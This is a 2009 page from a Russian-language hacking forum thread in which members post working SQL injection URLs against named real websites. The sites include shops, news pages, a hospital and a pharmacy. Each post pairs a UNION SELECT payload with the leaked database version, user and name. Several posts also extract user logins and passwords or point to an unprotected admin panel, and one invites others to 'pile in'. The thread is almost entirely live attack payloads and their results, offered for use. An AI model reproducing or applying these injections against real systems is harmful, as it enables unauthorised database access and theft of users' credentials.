ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8141  
Старый 04.03.2009, 20:13
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744

Репутация: 246
Отправить сообщение для S0ulVortex с помощью ICQ
По умолчанию

www.advancedbariatriccenter.net

Код:
http://www.advancedbariatriccenter.net/news.php?ax=v&n=9&id=9&nid=-3+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5--

version: 4.1.22-standard-log
user: advanced_admin@localhost
database: advanced_cms
 
Ответить с цитированием

  #8142  
Старый 04.03.2009, 21:15
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Код:
http://www.maxauto.ru/index.php?razdel=5&news=-1+union+select+1,concat_ws(0x3a,version( ),databas e(),user()),3,4,5--&page=1
Database Version : 5.0.24a-community-nt
Database name : news
User name : automax@localhost


---------------------------------------------------+

Код:
http://www.maestroauto.com.ua/goods.php?id=-1+union+select+1,2,3,4,concat_w s(0x3a,version (),database(),user()),6,7,8,9,10--
Database Version : 4.1.22-standard
Database name : doktor_automarket
User name : doktor_uzver@localhost


---------------------------------------------------+

Код:
http://www.contractshina.ru/about/index.php?pid=-1+union+select+concat_ ws(0x3a,version(),databas e(),user()),2,3,4--

Database Version : 5.0.45
Database name : contractshinaru
User name : contractshinaru@localhost


юзвери:

Код:
http://www.contractshina.ru/about/index.php?pid=-1+union+select+concat_ws(0x3a,regname ,password),2,3,4+fro m+users--
админка без авторизации :

Код:
http://contractshina.ru/admin
 
Ответить с цитированием

  #8143  
Старый 04.03.2009, 21:37
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию

Код:
http://www.yurmino.com/index.php?page=lech&id=-4+union+select+concat(user(),0x3a,version(),0x3a,database())--
u_yurmino@localhost:4.1.22:yurmino

PR=4

Код:
http://www.4x4parts.ru/come-up.shtml?id=-4+union+select+1,2,3,4,concat(version(),0x3a,database(),0x3a,user()),6,7,8--
5.0.45-log:4x4parts:4x4parts@localhost

PR=3

Код:
http://www.ralf-art.ru/news.php?id=-4+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7--
ralfart@localhost:4.1.22:ralfart

PR=4
 
Ответить с цитированием

  #8144  
Старый 04.03.2009, 22:13
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Ну вот как обычно небольшой сбор
Налетай
Код:
http://www.apslaquila.it/event.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database()),2--
версия/юзер/бд:

Код:
5.0.22:apslaquila@localhost:apslaquila
-----------------------------------------------------------------------

Код:
http://www.motortribe.it/news_view.php?ID=-1+union+all+select+0,1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15--
версия/юзер/бд:


Код:
5.0.22:mt_user@lnx6653:I-DEAS_motortribe
--------------------------------------------------------------------


Код:
http://www.alessandrastocchino.it/gallery.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database())--

версия/юзер/бд:


Код:
log:Sql85634@62.149.141.41:Sql85634_1
------------------------------------------------------------------

Код:
http://www.gurtenapotheke.ch/product.php?id=-1+union+all+select+concat_ws(0x3a,version(),user(),database()),1--
версия/юзер/бд:


Код:
4.1.25:gurtenap@localhost:gurtenap_data
-------------------------------------------------------------------

Код:
http://www.codexflores.ch/event.php?id=-1+union+all+select+0,1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7--
версия/юзер/бд:


Код:
5.0.45:root@localhost:codexflores
----------------------------------------------------------------------

Код:
http://www.marchanzeiger.ch/newsdetail.php?id=-1+union+all+select+0,1,concat_ws(0x3a,version(),user(),database()),3,4,5--
версия/юзер/бд:

Код:
4.0.24_Debian-10sarge1:marchanzeiger@localhost:marchanzeiger  3

---------------------------------------------------------------------

Код:
http://www.klassiker-garage.ch/show.php?ID=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8--

версия/юзер/бд:


Код:
4.1.22-standard:web373@localhost:usr_web373_1

-------------------------------------------------------------------


Код:
http://www.spitalzollikerberg.ch/download.php?id=-1+union+all+select+0,1,2,3,4,concat_ws(0x3a,version(),user(),database())--
версия/юзер/бд:


Код:
5.0.32-Debian_7etch8:root@localhost:cms24
---------------------------------------------------------------------

Код:
http://www.palatina.ch/gallery.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database()),2,3--
версия/юзер/бд:

Код:
4.1.18-standard:dabumpimpa_pa@localhost:dabumpimpa_palatina

------------------------------------------------------------------

Код:
http://www.theofficepub.at/event.php?id=-1+union+all+select+0,1,concat_ws(0x3a,version(),user(),database()),3,4,5--
версия/юзер/бд:


Код:
5.0.77-1-log:jist@localhost:jistTheOfficePub
---------------------------------------------------------------------
The End!
 
Ответить с цитированием

  #8145  
Старый 04.03.2009, 22:32
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.mebor.eu/main.php?ids=-148+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,concat_ws(0x3a,version(),database(),user()) ,35,36/*&t=0&lang=11



Database Version: 4.1.22-standard
Database name: meboreu_new
User name: meboreu_new@localhost
 
Ответить с цитированием

  #8146  
Старый 04.03.2009, 22:39
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Код:
http://www.bjshijirongtian.com.cn/fen.php?id=-133+union+select+1,2,version(),4,5,6,7/*
5.0.41-community-nt
 
Ответить с цитированием

  #8147  
Старый 04.03.2009, 23:08
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Код:
http://www.caraudiocenter.ru/catalog_f.php?m=coral&id=-1+union+select+1,2,3,concat _ws(0x3a,version(),database(),user()),5,6,7,8,9,10--
Database Version : 5.0.32-Debian_7etch6-log
Database name : z34747_aam
User name : z34747_aam@77.221.130.25


юзвери:

Код:
http://www.caraudiocenter.ru/catalog_f.php?m=coral&id=-1+union+select+1,2,3,concat_ ws(0x3a,email,password ),5,6,7,8,9,10+from+sa_users+limit+1,1--
вход по мылу
 
Ответить с цитированием

  #8148  
Старый 04.03.2009, 23:12
ПаВлУшКа
Новичок
Регистрация: 08.02.2009
Сообщений: 24
Провел на форуме:
81772

Репутация: 10
Отправить сообщение для ПаВлУшКа с помощью ICQ
По умолчанию

Наткнулся на интересную скулю, вот:
Код:
http://www.crysys.hu/showabstract.php?id=-118+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,version(),version(),28,29--
Интересна тем, что при запросе
Код:
http://www.crysys.hu/showabstract.php?id=-118+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
Она не выводит на экран поля, пришлось их угадывать.....кто знает, что это - напишите плиз в ЛС или icq - 95199999
 
Ответить с цитированием

  #8149  
Старый 05.03.2009, 01:00
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Код:
http://www.sehensw.hirnstetten.de/sw.php?id=-8+union+select+1,version()/*
5.0.45-Debian_1ubuntu3.4-log
 
Ответить с цитированием

  #8150  
Старый 05.03.2009, 01:47
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Код:
http://www.accnn.ru/index.php?id_page=-1+union+select+1,2,3,concat_ ws(0x3a,version(),database(),user()),5,6,7,8,9--
Database Version : 4.0.27-max-log
Database name : accnn99_acms
User name : accnn99_acms@v29.valuehost.ru


-----------------------------------------------------+

Код:
http://rezina.com.ua/news/?news_id=-826+union+select+1,concat _ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10--&q=0
Database Version : 5.0.45-log
Database name : rezina
User name : rezina@localhost
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ